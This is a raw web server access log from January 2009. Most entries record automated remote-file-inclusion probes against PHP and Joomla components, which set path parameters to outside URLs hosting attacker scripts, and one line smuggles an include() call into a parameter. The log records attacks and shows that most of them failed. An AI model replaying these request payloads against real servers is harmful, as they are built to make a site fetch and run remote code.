78.110.174.10 - - [04/Jan/2009:09:49:48 -0800] "GET /logs/access_080802.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:49:48 -0800] "GET /logs/access_080923.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:50:01 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:50:21 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:50:38 -0800] "GET /logs/access_081101.log//guestbook1//admin.php?include_path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:50:38 -0800] "GET /guestbook1//admin.php?include_path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:50:39 -0800] "GET /logs//guestbook1//admin.php?include_path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:50:49 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:50:49 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:50:49 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:09:50:53 -0800] "GET /logs/access_080207.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:50:55 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:51:00 -0800] "GET //?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 200 94833 "-" "libwww-perl/5.803" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:51:05 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:51:06 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:51:06 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:51:25 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.246.1.112 - - [04/Jan/2009:09:51:30 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
216.246.1.112 - - [04/Jan/2009:09:51:30 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
208.115.111.245 - - [04/Jan/2009:09:51:34 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:51:55 -0800] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:51:55 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:51:56 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95113 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
65.98.57.10 - - [04/Jan/2009:09:51:58 -0800] "GET /logs/access_081201.log//convert/mvcw.php?step=1&vwar_root=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
65.98.57.10 - - [04/Jan/2009:09:51:58 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
65.98.57.10 - - [04/Jan/2009:09:51:58 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
79.148.238.69 - - [04/Jan/2009:09:52:01 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.18.127 - - [04/Jan/2009:09:52:04 -0800] "GET /config.local.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
218.234.18.127 - - [04/Jan/2009:09:52:04 -0800] "GET /logs/config.local.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:52:05 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:52:05 -0800] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:52:05 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:52:05 -0800] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:52:05 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:52:05 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:52:07 -0800] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:52:08 -0800] "GET /logs/access_080313.log///calendar.php?s=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:52:11 -0800] "GET //calendar.php?s=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:52:12 -0800] "GET /logs/access_080501.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:52:13 -0800] "GET /logs///calendar.php?s=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:52:16 -0800] "GET //vwar/backup/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:52:16 -0800] "GET /logs/access_080816.log///vwar/backup/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:52:16 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:52:21 -0800] "GET /logs/access_081013.log///vwar/backup/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:52:22 -0800] "GET /logs/access_080501.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.57.10 - - [04/Jan/2009:09:52:25 -0800] "GET /logs/access_080522.log//convert/mvcw.php?step=1&vwar_root=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:32 -0800] "GET /logs/access_080714.log/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:32 -0800] "GET /main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:32 -0800] "GET /logs/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:52:33 -0800] "GET /citywriter/head.php?path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:39 -0800] "GET /logs/access_080724.log/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:39 -0800] "GET /logs/access_080714.log/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:39 -0800] "GET /main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:39 -0800] "GET /logs/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:40 -0800] "GET /logs/access_080724.log/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:40 -0800] "GET /logs/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:40 -0800] "GET /logs/access_080714.log/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:40 -0800] "GET /main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:52:40 -0800] "GET /logs/access_080724.log/main.php?pagina=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:52:48 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:52:48 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:52:48 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:52:48 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:52:53 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:52:53 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:52:53 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.101.68.240 - - [04/Jan/2009:09:53:03 -0800] "GET /config.php?path_to_root=http://amixblack.110mb.com/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:09:53:03 -0800] "GET /logs/access_080928.log//config.php?path_to_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:09:53:03 -0800] "GET /logs//config.php?path_to_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:09:53:03 -0800] "GET /config.php?path_to_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
212.34.140.136 - - [04/Jan/2009:09:53:19 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
212.34.140.136 - - [04/Jan/2009:09:53:19 -0800] "GET /logs//register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:53:26 -0800] "GET /logs///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:53:28 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.117.128.22 - - [04/Jan/2009:09:53:37 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.117.128.22 - - [04/Jan/2009:09:53:37 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.117.128.22 - - [04/Jan/2009:09:53:37 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:09:53:40 -0800] "GET /logs/access_080207.log//config.php?path_to_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
65.98.57.10 - - [04/Jan/2009:09:53:45 -0800] "GET /logs/access_080816.log//convert/mvcw.php?step=1&vwar_root=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:53:56 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:53:57 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:54:09 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:54:09 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:54:16 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
122.117.128.22 - - [04/Jan/2009:09:54:22 -0800] "GET /logs/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.117.128.22 - - [04/Jan/2009:09:54:22 -0800] "GET /errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.117.128.22 - - [04/Jan/2009:09:54:22 -0800] "GET /logs/access_080929.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:54:41 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:54:41 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:54:43 -0800] "GET /logs/access_080226.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:54:43 -0800] "GET /logs/access_080226.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:54:44 -0800] "GET /logs/access_080226.log/errors.php?error=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:54:47 -0800] "GET /logs/access_081114.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.30.81.169 - - [04/Jan/2009:09:56:02 -0800] "GET /logs/access_080719.log HTTP/1.0" 200 1310720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:56:02 -0800] "GET /logs/access_080726.log%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:56:06 -0800] "GET /logs/access_080714.log//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:56:19 -0800] "GET /logs/access_081114.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:56:30 -0800] "GET /logs/access_081114.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:56:45 -0800] "GET /logs/access_080118.log//citywriter/head.php?path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
